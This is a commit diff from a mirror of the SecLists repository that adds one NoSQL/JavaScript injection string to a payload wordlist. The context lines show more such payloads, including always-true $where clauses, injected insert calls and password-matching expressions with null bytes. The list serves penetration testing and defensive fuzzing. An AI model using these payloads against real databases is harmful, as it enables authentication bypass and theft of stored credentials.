mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-06-21 18:31:18 +00:00
Add string js or injection
This commit is contained in:
parent
e3d31edd19
commit
68fe48d9dd
@ -9,6 +9,7 @@ $where: '1 == 1'
|
||||
db.injection.insert({success:1});
|
||||
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||
|| 1==1
|
||||
' || 'a'=='a
|
||||
' && this.password.match(/.*/)//+%00
|
||||
' && this.passwordzz.match(/.*/)//+%00
|
||||
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||
|
Loading…
x
Reference in New Issue
Block a user